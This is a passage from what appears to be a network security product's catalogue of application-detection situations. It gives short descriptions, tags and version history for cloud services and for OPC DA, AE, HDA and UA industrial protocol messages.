Description: OneDesk offers software tools for issue tracking, help desk, project management, customer feedback, release management and product roadmapping.
Back to top

Onehub

About this situation: Onehub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site provides cloud content management and secure file sharing. This site provides web-based access to the user workspace, folders, and files, including on mobile devices.
Back to top

Onelogin

About this situation: OneLogin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service provides a cloud-based identity and access management (IAM) solution that offers single sign-on (SSO), allowing companies to secure and manage access to web applications both in the cloud and behind the firewall. It is an on-demand solution consisting of single sign-on, multi-factor authentication, directory integration, user provisioning, and a catalog with thousands of pre-integrated applications. Source: Wikipedia
Back to top

Onepagecrm

About this situation: OnePageCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: OnePage CRM uses a dashboard to rapidly process daily actions, keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Oneplace

About this situation: OnePlace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: OnePlace.com is the premier internet provider of online streaming Christian radio broadcasts and programs. Listen to your favorite Christian speakers, authors, and pastors including Dr. David Jeremiah, Kay Arthur, Charles Stanley, R.C. Sproul, Greg Laurie, Adrian Rogers, Beth Moore, and many more. Audio broadcasts by topic to find sermons and messages on issues important to you including Christian living, Bible study, salvation, marriage, prayer, Jesus Christ, parenting, and many more.
Back to top

OneSaas

About this situation: Application OneSaas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneSaas is SaaS cloud integration platform designed to solve the challenges of integrating separate Cloud-based or On-Site software solutions. OneSaas seamlessly integrates the most popular platforms from CRM, eCommerce, Invoicing, Email Marketing, Event Management, Project and Team Management and Accounting simplifying and optimizing business processes.
Back to top

OneScreen

About this situation: Application OneScreen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneScreen is a digital video company enabling publishers and advertisers to discover opportunities and manage operations and transactions.
Back to top

OneSoft-Connect

About this situation: Application OneSoft-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneSoft Connect provides enterpise management software for asset, ERP, CRM, HRM, risk, quality and project management.
Back to top

OneStat

About this situation: Application OneStat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneStat.com - is a provider of real-time web analytics and website statistics software.
Back to top

OneTrust

About this situation: OneTrust usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Description: OneTrust is a platform to operationalize privacy, security and data governance.
Back to top

Online Brokerage and Trading

About this situation: Sites that support active trading of securities and investment management.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support active trading of securities and investment management.
Back to top

Online-Certificate-Status-Protocol

About this situation: Online Certificate Status Protocol (OCSP) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1802-5242
Description: This protocol obtains the revocation status of an X.509 digital certificate. As an alternative to certificate revocation lists (CRL), this protocol specifically addresses certain problems associated with using CRLs in a public key infrastructure (PKI). Messages communicated over OCSP are encoded in ASN.1 and are usually communicated over HTTP. The request or response nature of these messages leads to OCSP servers being termed OCSP responders. Source: Wikipedia
Back to top

Online-Charts

About this situation: Application Online-Charts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online Charts allow create online graphs and charts. Choose from different chart types, like: line and bar charts, pie charts, scatter graphs, XY graph and pie charts.
Back to top

Online-Chat-Centers

About this situation: online Chat Centers usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Online-Convert

About this situation: Application Online-Convert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online Convert provides online file converting service.
Back to top

Onlinegames

About this situation: OnlineGames usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

OnlineJobs

About this situation: Application OnlineJobs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnlineJobs is an online marketplace for finding and hiring Filipino virtual assistants and employees.
Back to top

OnlineOCR

About this situation: Application OnlineOCR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnlineOCR is a web-based Optical Character Recognition software
Back to top

Onlinerealgames.com

About this situation: onlinerealgames.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A gaming website
Back to top

Onlyoffice

About this situation: ONLYOFFICE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ONLYOFFICE formerly Teamlab Office, is a multifunctional online office suite integrated with CRM system, document and project management toolset, Gantt chart and email aggregator.
Back to top

Onrpg-Games

About this situation: OnRPG Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Onsight

About this situation: Application Onsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Onsight provides mobile apps that are used by manufacturers, wholesalers and distributors to make outside sales teams. Its merchandising app allows merchandisers or outside sales reps to perform retail audits and merchandising inspections using mobile device.
Back to top

onSIP

About this situation: Application onSIP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnSIP delivers business VoIP communications services based on IP telephony technologies. OnSIP delivers communications services over a geographically distributed platform.
Back to top

Onstream-Media

About this situation: Application Onstream-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Onstream Media Corporation, is online service provider of corporate rich media communications, including live and on-demand webcasting, webinars, conferencing and virtual event technology.
Back to top

OnSwipe

About this situation: Application OnSwipe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Onswipe is a New York-based tablet publishing company that creates customized mobile sites for web publishers.
Back to top

OnSync

About this situation: Application OnSync detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnSync is Digital Samba's intuitive and easy to use flash based web conferencing solution.
Back to top

Ontraport

About this situation: Application Ontraport detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OfficeAutopilot is an all-in-one business and marketing platform designed for information marketers, experts, and coaches.
Back to top

Ontv

About this situation: ontv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service is an online video broadcast operated by Oriental Press Group.
Back to top

ONX

About this situation: Application ONX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ONX helpes clients identify opportunities to achieve business results. It delivers technology offerings and has the technical expertise, professional services.
Back to top

Oogwave

About this situation: Application Oogwave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oogwave is powerful collaboration tool for teams of all sizes. Store and share files, communicate and collaborate on projects from anywhere anytime.
Back to top

Oomnitza

About this situation: Application Oomnitza detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oomnitza is a Silicon Valley based enterprise software company. It develops IT asset management solutions that are mobile-first, customizable, and user friendly.
Back to top

Ooredoo-Cloud

About this situation: Application Ooredoo-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ooredoo Cloud is a flexible, self-service and pay-per use virtual computing platform.
Back to top

Oorjit-eCommerce-Platform

About this situation: Application Oorjit-eCommerce-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oorjit is a provider of customer merchant engagement solutions. Oorjit creates channels like eCommerce, Social commerce, coupons etc
Back to top

ooVoo

About this situation: ooVoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1096-5242
Description: ooVoo is a proprietary instant messaging client developed by ooVoo LLC.
Back to top

Ooyala

About this situation: Ooyala usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-636-5211
Description: Ooyala provides video content streaming services for media companies.
Back to top

op5-Monitor

About this situation: Application op5-Monitor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: op5 Monitor help you as an IT professional to get in control of IT stuff. From the basement server to the hybrid cloud, open and flexible network monitoring solution delivers a unified view of your entire IT.
Back to top

OPC-AE-IOPCEventAreaBrowser

About this situation: MSRPC protocol traffic to OPC AE IOPCEventAreaBrowser Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventAreaBrowser Interface.
Back to top

OPC-AE-IOPCEventServer

About this situation: MSRPC protocol traffic to OPC AE IOPCEventServer Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventServer Interface.
Back to top

OPC-AE-IOPCEventServer2

About this situation: MSRPC protocol traffic to OPC AE IOPCEventServer2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventServer2 Interface.
Back to top

OPC-AE-IOPCEventSink

About this situation: MSRPC protocol traffic to OPC AE IOPCEventSink Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventSink Interface.
Back to top

OPC-AE-IOPCEventSubscriptionMgt

About this situation: MSRPC protocol traffic to OPC AE IOPCEventSubscriptionMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventSubscriptionMgt Interface.
Back to top

OPC-AE-IOPCEventSubscriptionMgt2

About this situation: MSRPC protocol traffic to OPC AE IOPCEventSubscriptionMgt2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE IOPCEventSubscriptionMgt2 Interface.
Back to top

OPC-AE-OPCEventServerCATID

About this situation: MSRPC protocol traffic to OPC AE OPCEventServerCATID Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Alarms and Events
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC AE OPCEventServerCATID Interface.
Back to top

OPC-DA-CATID-OPCDAServer10

About this situation: MSRPC protocol traffic to OPC DA CATID OPCDAServer10 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA CATID OPCDAServer10 Interface.
Back to top

OPC-DA-CATID-OPCDAServer20

About this situation: MSRPC protocol traffic to OPC DA CATID OPCDAServer20 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA CATID OPCDAServer20 Interface.
Back to top

OPC-DA-CATID-OPCDAServer30

About this situation: MSRPC protocol traffic to OPC DA CATID OPCDAServer30 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA CATID OPCDAServer30 Interface.
Back to top

OPC-DA-CATID-XMLDAServer10

About this situation: MSRPC protocol traffic to OPC DA CATID XMLDAServer10 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA CATID XMLDAServer10 Interface.
Back to top

OPC-DA-IEnumOPCItemAttributes

About this situation: MSRPC protocol traffic to OPC DA IEnumOPCItemAttributes Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IEnumOPCItemAttributes Interface.
Back to top

OPC-DA-IOPCAsyncIO

About this situation: MSRPC protocol traffic to OPC DA IOPCAsyncIO Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCAsyncIO Interface.
Back to top

OPC-DA-IOPCAsyncIO2

About this situation: MSRPC protocol traffic to OPC DA IOPCAsyncIO2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCAsyncIO2 Interface.
Back to top

OPC-DA-IOPCAsyncIO3

About this situation: MSRPC protocol traffic to OPC DA IOPCAsyncIO3 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCAsyncIO3 Interface.
Back to top

OPC-DA-IOPCBrowse

About this situation: MSRPC protocol traffic to OPC DA IOPCBrowse Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCBrowse Interface.
Back to top

OPC-DA-IOPCBrowseServerAddressSpace

About this situation: MSRPC protocol traffic to OPC DA IOPCBrowseServerAddressSpace Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCBrowseServerAddressSpace Interface.
Back to top

OPC-DA-IOPCDataCallback

About this situation: MSRPC protocol traffic to OPC DA IOPCDataCallback Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCDataCallback Interface.
Back to top

OPC-DA-IOPCGroupStateMgt

About this situation: MSRPC protocol traffic to OPC DA IOPCGroupStateMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCGroupStateMgt Interface.
Back to top

OPC-DA-IOPCGroupStateMgt2

About this situation: MSRPC protocol traffic to OPC DA IOPCGroupStateMgt2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCGroupStateMgt2 Interface.
Back to top

OPC-DA-IOPCItemDeadbandMgt

About this situation: MSRPC protocol traffic to OPC DA IOPCItemDeadbandMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCItemDeadbandMgt Interface.
Back to top

OPC-DA-IOPCItemIO

About this situation: MSRPC protocol traffic to OPC DA IOPCItemIO Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCItemIO Interface.
Back to top

OPC-DA-IOPCItemMgt

About this situation: MSRPC protocol traffic to OPC DA IOPCItemMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCItemMgt Interface.
Back to top

OPC-DA-IOPCItemProperties

About this situation: MSRPC protocol traffic to OPC DA IOPCItemProperties Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCItemProperties Interface.
Back to top

OPC-DA-IOPCItemSamplingMgt

About this situation: MSRPC protocol traffic to OPC DA IOPCItemSamplingMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCItemSamplingMgt Interface.
Back to top

OPC-DA-IOPCPublicGroupStateMgt

About this situation: MSRPC protocol traffic to OPC DA IOPCPublicGroupStateMgt Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCPublicGroupStateMgt Interface.
Back to top

OPC-DA-IOPCServer

About this situation: MSRPC protocol traffic to OPC DA IOPCServer Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCServer Interface.
Back to top

OPC-DA-IOPCServerPublicGroups

About this situation: MSRPC protocol traffic to OPC DA IOPCServerPublicGroups Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCServerPublicGroups Interface.
Back to top

OPC-DA-IOPCSyncIO

About this situation: MSRPC protocol traffic to OPC DA IOPCSyncIO Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCSyncIO Interface.
Back to top

OPC-DA-IOPCSyncIO2

About this situation: MSRPC protocol traffic to OPC DA IOPCSyncIO2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC DA IOPCSyncIO2 Interface.
Back to top

OPC-HDA-CATID-OPCHDAServer10

About this situation: MSRPC protocol traffic to OPC HDA CATID OPCHDAServer10 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA CATID OPCHDAServer10 Interface.
Back to top

OPC-HDA-IOPCHDA-AsyncAnnotations

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncAnnotations Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncAnnotations Interface.
Back to top

OPC-HDA-IOPCHDA-AsyncRead

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncRead Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncRead Interface.
Back to top

OPC-HDA-IOPCHDA-AsyncUpdate

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncUpdate Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA AsyncUpdate Interface.
Back to top

OPC-HDA-IOPCHDA-Browser

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA Browser Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA Browser Interface.
Back to top

OPC-HDA-IOPCHDA-DataCallback

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA DataCallback Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA DataCallback Interface.
Back to top

OPC-HDA-IOPCHDA-Playback

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA Playback Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA Playback Interface.
Back to top

OPC-HDA-IOPCHDA-Server

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA Server Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA Server Interface.
Back to top

OPC-HDA-IOPCHDA-SyncAnnotations

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA SyncAnnotations Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA SyncAnnotations Interface.
Back to top

OPC-HDA-IOPCHDA-SyncRead

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA SyncRead Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA SyncRead Interface.
Back to top

OPC-HDA-IOPCHDA-SyncUpdate

About this situation: MSRPC protocol traffic to OPC HDA IOPCHDA SyncUpdate Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Historical Data Access
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to OPC HDA IOPCHDA SyncUpdate Interface.
Back to top

OPC-UA-Binary-Activate-Session-Req

About this situation: OPC UA Binary Activate Session Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Activate Session Request.
Back to top

OPC-UA-Binary-Activate-Session-Rsp

About this situation: OPC UA Binary Activate Session Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Activate Session Response.
Back to top

OPC-UA-Binary-Add-Nodes-Req

About this situation: OPC UA Binary Add Nodes Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Add Nodes Request.
Back to top

OPC-UA-Binary-Add-Nodes-Rsp

About this situation: OPC UA Binary Add Nodes Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Add Nodes Response.
Back to top

OPC-UA-Binary-Add-References-Req

About this situation: OPC UA Binary Add References Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Add References Request.
Back to top

OPC-UA-Binary-Add-References-Rsp

About this situation: OPC UA Binary Add References Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Add References Response.
Back to top

OPC-UA-Binary-Browse-Next-Req

About this situation: OPC UA Binary Browse Next Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Browse Next Request.
Back to top

OPC-UA-Binary-Browse-Next-Rsp

About this situation: OPC UA Binary Browse Next Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Browse Next Response.
Back to top

OPC-UA-Binary-Browse-Req

About this situation: OPC UA Binary Browse Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Browse Request.
Back to top

OPC-UA-Binary-Browse-Rsp

About this situation: OPC UA Binary Browse Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Browse Response.
Back to top

OPC-UA-Binary-Call-Req

About this situation: OPC UA Binary Call Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Call Request.
Back to top

OPC-UA-Binary-Call-Rsp

About this situation: OPC UA Binary Call Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Call Response.
Back to top

OPC-UA-Binary-Cancel-Req

About this situation: OPC UA Binary Cancel Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Cancel Request.
Back to top

OPC-UA-Binary-Cancel-Rsp

About this situation: OPC UA Binary Cancel Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Cancel Response.
Back to top

OPC-UA-Binary-Close-Session-Req

About this situation: OPC UA Binary Close Session Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Close Session Request.
Back to top

OPC-UA-Binary-Close-Session-Rsp

About this situation: OPC UA Binary Close Session Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Close Session Response.
Back to top

OPC-UA-Binary-Create-Monitored-Items-Req

